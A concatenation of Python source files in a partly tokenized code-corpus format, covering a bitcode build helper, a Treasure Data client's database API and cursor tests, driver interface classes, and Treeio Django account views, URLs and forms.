wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> _logger . warning ( '<STR_LIT>' . format ( str ( cc ) ) ) <EOL> sys . exit ( rc ) <EOL> def buildBitcodeFile ( builder , srcFile , bcFile ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> bcc = builder . getBitcodeCompiler ( ) <EOL> bcc . extend ( af . compileArgs ) <EOL> bcc . extend ( [ '<STR_LIT:-c>' , srcFile ] ) <EOL> bcc . extend ( [ '<STR_LIT>' , bcFile ] ) <EOL> _logger . debug ( '<STR_LIT>' . format ( bcc ) ) <EOL> proc = Popen ( bcc ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> _logger . warning ( '<STR_LIT>' . format ( bcFile , srcFile ) ) <EOL> sys . exit ( rc ) <EOL> def buildObjectFile ( builder , srcFile , objFile ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> cc = builder . getCompiler ( ) <EOL> cc . extend ( af . compileArgs ) <EOL> cc . append ( srcFile ) <EOL> cc . extend ( [ '<STR_LIT:-c>' , '<STR_LIT>' , objFile ] ) <EOL> _logger . debug ( '<STR_LIT>' . 
format ( cc ) ) <EOL> proc = Popen ( cc ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> _logger . warning ( '<STR_LIT>' . format ( objFile , srcFile ) ) <EOL> sys . exit ( rc ) </s>
from __future__ import print_function
from __future__ import unicode_literals

try:
    from urllib.parse import quote as urlquote
except ImportError:
    from urllib import quote as urlquote


class DatabaseAPI(object):
    """<STR_LIT>"""

    def list_databases(self):
        """<STR_LIT>"""
        with self.get("<STR_LIT>") as res:
            status, body = res.status, res.read()
            if status != 200:
                self.raise_error("<STR_LIT>", res, body)
            parsed = self.checked_json(body, ["<STR_LIT>"])
            result = {}
            for entry in parsed["<STR_LIT>"]:
                name = entry.get("<STR_LIT:name>")
                count = entry.get("<STR_LIT:count>")
                # Timestamps come back as strings; fall back to a default
                # before parsing so missing fields do not blow up.
                created_at = self._parsedate(
                    self.get_or_else(entry, "<STR_LIT>", "<STR_LIT>"), "<STR_LIT>")
                updated_at = self._parsedate(
                    self.get_or_else(entry, "<STR_LIT>", "<STR_LIT>"), "<STR_LIT>")
                permission = entry.get("<STR_LIT>")
                result[name] = [count, created_at, updated_at, None, permission]
            return result

    def delete_database(self, db):
        """<STR_LIT>"""
        with self.post("<STR_LIT>" % urlquote(str(db))) as res:
            status, body = res.status, res.read()
            if status != 200:
                self.raise_error("<STR_LIT>", res, body)
            return True

    def create_database(self, db, params=None):
        """<STR_LIT>"""
        # Never use a mutable default; build a fresh dict per call.
        params = {} if params is None else params
        with self.post("<STR_LIT>" % urlquote(str(db)), params) as res:
            status, body = res.status, res.read()
            if status != 200:
                self.raise_error("<STR_LIT>", res, body)
            return True
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> try : <EOL> from unittest import mock <EOL> except ImportError : <EOL> import mock <EOL> import pytest <EOL> from tdclient import cursor <EOL> from tdclient import errors <EOL> from tdclient . test . test_helper import * <EOL> def setup_function ( function ) : <EOL> unset_environ ( ) <EOL> def test_cursor ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . rowcount == - <NUM_LIT:1> <EOL> assert td . description == [ ] <EOL> def test_cursor_close ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . close ( ) <EOL> assert td . api . close . called <EOL> def test_cursor_execute ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . api . query = mock . MagicMock ( return_value = <NUM_LIT> ) <EOL> td . _do_execute = mock . MagicMock ( ) <EOL> assert td . execute ( "<STR_LIT>" ) == <NUM_LIT> <EOL> td . api . query . assert_called_with ( "<STR_LIT>" , db = "<STR_LIT>" ) <EOL> assert td . _do_execute . called <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == - <NUM_LIT:1> <EOL> assert td . _description == [ ] <EOL> def test_cursor_execute_format_dict ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . api . query = mock . MagicMock ( return_value = <NUM_LIT> ) <EOL> td . _do_execute = mock . MagicMock ( ) <EOL> assert td . execute ( "<STR_LIT>" , args = { "<STR_LIT:i>" : <NUM_LIT> , "<STR_LIT:t>" : "<STR_LIT>" } ) == <NUM_LIT> <EOL> td . api . query . assert_called_with ( "<STR_LIT>" , db = "<STR_LIT>" ) <EOL> assert td . _do_execute . called <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == - <NUM_LIT:1> <EOL> assert td . 
_description == [ ] <EOL> def test_cursor_execute_format_tuple ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . execute ( "<STR_LIT>" , args = ( <NUM_LIT> , "<STR_LIT>" ) ) <EOL> def test_cursor_executemany ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . api . query = mock . MagicMock ( side_effect = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> td . _do_execute = mock . MagicMock ( ) <EOL> assert td . executemany ( "<STR_LIT>" , [ { "<STR_LIT:i>" : <NUM_LIT:1> } , { "<STR_LIT:i>" : <NUM_LIT:2> } , { "<STR_LIT:i>" : <NUM_LIT:3> } ] ) == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> td . api . query . assert_called_with ( "<STR_LIT>" , db = "<STR_LIT>" ) <EOL> assert td . _do_execute . called <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == - <NUM_LIT:1> <EOL> assert td . _description == [ ] <EOL> def test_check_executed ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> assert td . _executed is None <EOL> with pytest . raises ( errors . ProgrammingError ) as error : <EOL> td . _check_executed ( ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _check_executed ( ) <EOL> def test_do_execute_success ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _check_executed = mock . MagicMock ( return_value = True ) <EOL> td . api . job_status = mock . MagicMock ( return_value = "<STR_LIT:success>" ) <EOL> td . api . job_result = mock . MagicMock ( return_value = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] ) <EOL> td . api . show_job = mock . MagicMock ( return_value = { "<STR_LIT>" : [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] ] } ) <EOL> td . _do_execute ( ) <EOL> assert td . 
_check_executed . called <EOL> td . api . job_status . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . job_result . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . show_job . assert_called_with ( "<STR_LIT>" ) <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == <NUM_LIT:3> <EOL> assert td . _description == [ ( "<STR_LIT>" , None , None , None , None , None , None ) , ( "<STR_LIT>" , None , None , None , None , None , None ) ] <EOL> def test_do_execute_error ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . api . job_status = mock . MagicMock ( side_effect = [ "<STR_LIT:error>" ] ) <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . _do_execute ( ) <EOL> def test_do_execute_wait ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" , wait_interval = <NUM_LIT:5> , wait_callback = mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _check_executed = mock . MagicMock ( return_value = True ) <EOL> td . api . job_status = mock . MagicMock ( side_effect = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:success>" ] ) <EOL> td . api . job_result = mock . MagicMock ( return_value = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] ) <EOL> td . api . show_job = mock . MagicMock ( return_value = { "<STR_LIT>" : [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] ] } ) <EOL> with mock . patch ( "<STR_LIT>" ) as t_sleep : <EOL> td . _do_execute ( ) <EOL> t_sleep . assert_called_with ( <NUM_LIT:5> ) <EOL> assert td . wait_callback . called <EOL> assert td . _check_executed . called <EOL> td . api . job_status . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . job_result . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . show_job . assert_called_with ( "<STR_LIT>" ) <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . 
_rowcount == <NUM_LIT:3> <EOL> assert td . _description == [ ( "<STR_LIT>" , None , None , None , None , None , None ) , ( "<STR_LIT>" , None , None , None , None , None , None ) ] <EOL> def test_result_description ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> assert td . _result_description ( None ) == [ ] <EOL> assert td . _result_description ( [ [ "<STR_LIT>" , "<STR_LIT:int>" ] ] ) == [ ( "<STR_LIT>" , None , None , None , None , None , None ) ] <EOL> def test_fetchone ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _rows = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> td . _rownumber = <NUM_LIT:0> <EOL> td . _rowcount = len ( td . _rows ) <EOL> assert td . fetchone ( ) == [ "<STR_LIT:foo>" , <NUM_LIT:1> ] <EOL> assert td . fetchone ( ) == [ "<STR_LIT:bar>" , <NUM_LIT:1> ] <EOL> assert td . fetchone ( ) == [ "<STR_LIT>" , <NUM_LIT:2> ] <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . fetchone ( ) <EOL> def test_fetchmany ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _rows = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> td . _rownumber = <NUM_LIT:0> <EOL> td . _rowcount = len ( td . _rows ) <EOL> assert td . fetchmany ( <NUM_LIT:2> ) == [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] ] <EOL> assert td . fetchmany ( ) == [ [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . fetchmany ( ) <EOL> def test_fetchall ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _rows = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> td . _rownumber = <NUM_LIT:0> <EOL> td . _rowcount = len ( td . 
_rows ) <EOL> assert td . fetchall ( ) == [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . fetchall ( ) <EOL> def test_show_job ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . show_job ( ) <EOL> td . api . show_job . assert_called_with ( "<STR_LIT>" ) <EOL> def test_job_status ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . job_status ( ) <EOL> td . api . job_status . assert_called_with ( "<STR_LIT>" ) <EOL> def test_job_result ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . job_result ( ) <EOL> td . api . job_result . assert_called_with ( "<STR_LIT>" ) <EOL> def test_cursor_callproc ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . callproc ( "<STR_LIT:f>" ) <EOL> def test_cursor_nextset ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . nextset ( ) <EOL> def test_cursor_setinputsizes ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . setinputsizes ( <NUM_LIT> ) <EOL> def test_cursor_setoutputsize ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . setoutputsize ( <NUM_LIT> ) </s>
class Driver(object):
    """Common base for all drivers; subclasses may override get_config()."""

    def get_config(self):
        # Default: no driver-specific configuration.
        return {}


class SyncDriverError(Exception):
    """Raised by SyncDriver implementations on failure."""

    def __init__(self, message, errorno):
        Exception.__init__(self, message)
        # Fix: set the attribute explicitly. BaseException no longer exposes
        # a `message` attribute on Python 3, so __str__ below would raise
        # AttributeError without this assignment.
        self.message = message
        self.errorno = errorno

    def __str__(self):
        return self.message


class SyncDriver(Driver):
    """Interface for drivers that synchronize state."""

    def sync(self, args):
        raise NotImplementedError


class LockDriverError(Exception):
    """Raised by LockDriver implementations on failure."""

    def __init__(self, message, errorno):
        Exception.__init__(self, message)
        # See SyncDriverError: explicit assignment keeps __str__ working on Python 3.
        self.message = message
        self.errorno = errorno

    def __str__(self):
        return self.message


class LockDriver(Driver):
    """Interface for drivers that manage an exclusion lock."""

    def check_lock(self, args):
        raise NotImplementedError

    def add_lock(self, args):
        raise NotImplementedError

    def remove_lock(self, args):
        raise NotImplementedError


class ServiceDriverError(Exception):
    """Raised by ServiceDriver implementations on failure."""

    def __init__(self, message, errorno):
        Exception.__init__(self, message)
        # See SyncDriverError: explicit assignment keeps __str__ working on Python 3.
        self.message = message
        self.errorno = errorno

    def __str__(self):
        return self.message


class ServiceDriver(Driver):
    """Interface for drivers that control a service's lifecycle."""

    def stop(self, args):
        raise NotImplementedError

    def start(self, args):
        raise NotImplementedError

    def restart(self, args):
        raise NotImplementedError

    def reload(self, args):
        raise NotImplementedError


class ReportDriverError(Exception):
    """Raised by ReportDriver implementations on failure."""

    def __init__(self, message, errorno):
        Exception.__init__(self, message)
        # See SyncDriverError: explicit assignment keeps __str__ working on Python 3.
        self.message = message
        self.errorno = errorno

    def __str__(self):
        return self.message


class ReportDriver(Driver):
    """Interface for drivers that produce reports."""

    def report(self, args):
        raise NotImplementedError
<s> """<STR_LIT>""" <EOL> from treeio . core . rendering import render_to_response <EOL> from django . template import RequestContext <EOL> from django . http import HttpResponseRedirect <EOL> from django . core . urlresolvers import reverse <EOL> from treeio . account . forms import AccountForm , AccountPasswordForm , SettingsForm , MassActionForm <EOL> from treeio . core . decorators import treeio_login_required , handle_response_format <EOL> from treeio . core . models import ModuleSetting , Perspective <EOL> from treeio . account . models import NotificationSetting <EOL> from treeio . core . conf import settings <EOL> from jinja2 import Markup <EOL> @ treeio_login_required <EOL> def account_view ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> try : <EOL> contacts = profile . contact_set . exclude ( trash = True ) <EOL> except : <EOL> contacts = [ ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : profile , '<STR_LIT>' : contacts } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def watchlist ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> watchlist = profile . subscriptions . all ( ) <EOL> context = { '<STR_LIT>' : profile , '<STR_LIT>' : watchlist } <EOL> return render_to_response ( '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def account_edit ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> if request . POST : <EOL> form = AccountForm ( request . POST , instance = profile ) <EOL> if form . is_valid ( ) : <EOL> form . 
save ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> form = AccountForm ( instance = profile ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : Markup ( form . as_ul ( ) ) } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def account_password ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> if request . POST : <EOL> if '<STR_LIT>' not in request . POST : <EOL> form = AccountPasswordForm ( request . user , request . POST ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> form = AccountPasswordForm ( request . user ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : Markup ( form . as_ul ( ) ) } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ treeio_login_required <EOL> def settings_view ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> user = request . user . profile <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> default_permissions = conf . value <EOL> except : <EOL> default_permissions = settings . HARDTREE_DEFAULT_PERMISSIONS <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> default_perspective = Perspective . objects . get ( pk = long ( conf . value ) ) <EOL> except : <EOL> default_perspective = None <EOL> language = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> conf = ModuleSetting . 
get ( '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> language = conf . value <EOL> except IndexError : <EOL> pass <EOL> all_languages = getattr ( <EOL> settings , '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> default_timezone = settings . HARDTREE_SERVER_DEFAULT_TIMEZONE <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> default_timezone = conf . value <EOL> except : <EOL> pass <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> default_timezone = conf . value <EOL> except : <EOL> default_timezone = getattr ( <EOL> settings , '<STR_LIT>' ) [ default_timezone ] [ <NUM_LIT:0> ] <EOL> all_timezones = getattr ( settings , '<STR_LIT>' ) <EOL> email_notifications = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> email_notifications = conf . value <EOL> except : <EOL> pass <EOL> try : <EOL> ns = NotificationSetting . objects . get ( owner = user , enabled = True ) <EOL> notifications_for_modules = [ m . title for m in ns . modules . all ( ) ] <EOL> except NotificationSetting . DoesNotExist : <EOL> notifications_for_modules = [ ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : default_permissions , <EOL> '<STR_LIT>' : default_perspective , <EOL> '<STR_LIT>' : language , <EOL> '<STR_LIT>' : all_languages , <EOL> '<STR_LIT>' : default_timezone , <EOL> '<STR_LIT>' : all_timezones , <EOL> '<STR_LIT>' : email_notifications , <EOL> '<STR_LIT>' : notifications_for_modules , <EOL> } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def settings_edit ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> if request . POST : <EOL> if '<STR_LIT>' not in request . POST : <EOL> form = SettingsForm ( request . user . profile , request . 
POST ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> form = SettingsForm ( request . user . profile ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : Markup ( form . as_ul ( ) ) } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> def _process_mass_form ( f ) : <EOL> "<STR_LIT>" <EOL> def wrap ( request , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> user = request . user . profile <EOL> if '<STR_LIT>' in request . POST : <EOL> for key in request . POST : <EOL> if '<STR_LIT>' in key : <EOL> try : <EOL> report = NotificationSetting . objects . get ( pk = request . POST [ key ] ) <EOL> form = MassActionForm ( <EOL> user , request . POST , instance = report ) <EOL> if form . is_valid ( ) and user . has_permission ( report , mode = '<STR_LIT:w>' ) : <EOL> form . save ( ) <EOL> except : <EOL> pass <EOL> return f ( request , * args , ** kwargs ) <EOL> wrap . __doc__ = f . __doc__ <EOL> wrap . __name__ = f . __name__ <EOL> return wrap </s>
from django.conf.urls import patterns, url

# Route table for this module; the `name` kwargs allow reverse() lookups
# from views and templates.
urlpatterns = patterns(
    '<STR_LIT>',
    url(r'<STR_LIT>', '<STR_LIT>',
        name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>',
        name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>',
        name="<STR_LIT>"),
)
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from django import forms <EOL> from django . db import router <EOL> from django . core . exceptions import ValidationError <EOL> from django . core . urlresolvers import reverse <EOL> from treeio . core . models import Object <EOL> from captcha . fields import CaptchaField <EOL> from django . utils . translation import ugettext as _ <EOL> from treeio . core . conf import settings <EOL> from django . db . models import Q <EOL> import django . contrib . auth . models as django_auth <EOL> from jinja2 . filters import do_striptags , do_truncate <EOL> from treeio . core . models import Location , User , Widget , Tag , ConfigSetting <EOL> from treeio . core . mail import EmailPassword <EOL> from treeio . identities . models import Contact , ContactType , ContactValue <EOL> class PermissionForm ( forms . ModelForm ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> super ( PermissionForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Object <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class SubscribeForm ( forms . Form ) : <EOL> "<STR_LIT>" <EOL> subscriber = forms . ModelChoiceField ( queryset = User . objects . all ( ) ) <EOL> def __init__ ( self , instance , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> subscriptions = instance . subscribers . all ( ) <EOL> super ( SubscribeForm , self ) . 
__init__ ( * args , ** kwargs ) <EOL> self . subscriptions = subscriptions <EOL> self . instance = instance <EOL> self . fields [ '<STR_LIT>' ] . label = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . queryset = User . objects . exclude ( <EOL> pk__in = subscriptions ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> user = self . cleaned_data [ '<STR_LIT>' ] <EOL> object = self . instance <EOL> if user not in self . subscriptions : <EOL> object . subscribers . add ( user ) <EOL> self . subscriptions = object . subscribers . all ( ) <EOL> return self . subscriptions <EOL> class ObjectLinksForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> links = forms . ModelChoiceField ( queryset = [ ] , empty_label = None , label = '<STR_LIT>' ) <EOL> def __init__ ( self , user , response_format , instance , * args , ** kwargs ) : <EOL> super ( ObjectLinksForm , self ) . __init__ ( * args , ** kwargs ) <EOL> queryset = Object . filter_permitted ( user , Object . objects ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = queryset <EOL> if '<STR_LIT>' not in response_format : <EOL> if instance : <EOL> queryset = queryset . exclude ( pk__in = instance . links . all ( ) ) <EOL> choices = [ ] <EOL> for obj in queryset : <EOL> human_type = obj . get_human_type ( ) <EOL> name = do_truncate ( <EOL> do_striptags ( unicode ( obj . object_name ) ) , <NUM_LIT:20> , True ) <EOL> if human_type : <EOL> name += u"<STR_LIT>" + human_type + u"<STR_LIT:)>" <EOL> choices . append ( ( obj . id , name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = choices <EOL> self . fields [ '<STR_LIT>' ] . label = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . initial = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . 
update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> class TagsForm ( forms . Form ) : <EOL> tags = forms . ModelMultipleChoiceField ( queryset = Tag . objects . all ( ) ) <EOL> def __init__ ( self , tags , * args , ** kwargs ) : <EOL> super ( TagsForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . initial = [ tag . id for tag in tags ] <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> def save ( self ) : <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> class LoginForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> captcha = CaptchaField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( LoginForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if settings . CAPTCHA_DISABLE : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> class PasswordResetForm ( forms . Form ) : <EOL> "<STR_LIT>" <EOL> username = forms . CharField ( label = ( "<STR_LIT>" ) , max_length = <NUM_LIT> ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( PasswordResetForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:username>' ] . label = _ ( "<STR_LIT>" ) <EOL> def clean_username ( self ) : <EOL> """<STR_LIT>""" <EOL> username = self . cleaned_data [ "<STR_LIT:username>" ] <EOL> if '<STR_LIT:@>' in username : <EOL> emails = ContactValue . objects . filter ( value = username , <EOL> field__field_type = '<STR_LIT:email>' , <EOL> contact__trash = False , <EOL> contact__related_user__isnull = False ) <EOL> users = [ email . contact . related_user . user for email in emails ] <EOL> else : <EOL> users = User . objects . filter ( user__username = username ) <EOL> if len ( users ) == <NUM_LIT:0> : <EOL> raise forms . 
ValidationError ( <EOL> _ ( "<STR_LIT>" ) ) <EOL> else : <EOL> username = users [ <NUM_LIT:0> ] <EOL> return username <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> user = self . cleaned_data [ "<STR_LIT:username>" ] <EOL> if user : <EOL> toaddr = user . get_contact ( ) . get_email ( ) <EOL> if toaddr : <EOL> password = user . generate_new_password ( ) <EOL> email = EmailPassword ( toaddr , user . user . username , password ) <EOL> email . send_email ( ) <EOL> class InvitationForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> invitation = None <EOL> def __init__ ( self , invitation = None , * args , ** kwargs ) : <EOL> super ( InvitationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:username>' ] = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) ) <EOL> self . fields [ '<STR_LIT:name>' ] = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) ) <EOL> self . fields [ '<STR_LIT:password>' ] = forms . CharField ( max_length = <NUM_LIT:255> , label = _ ( 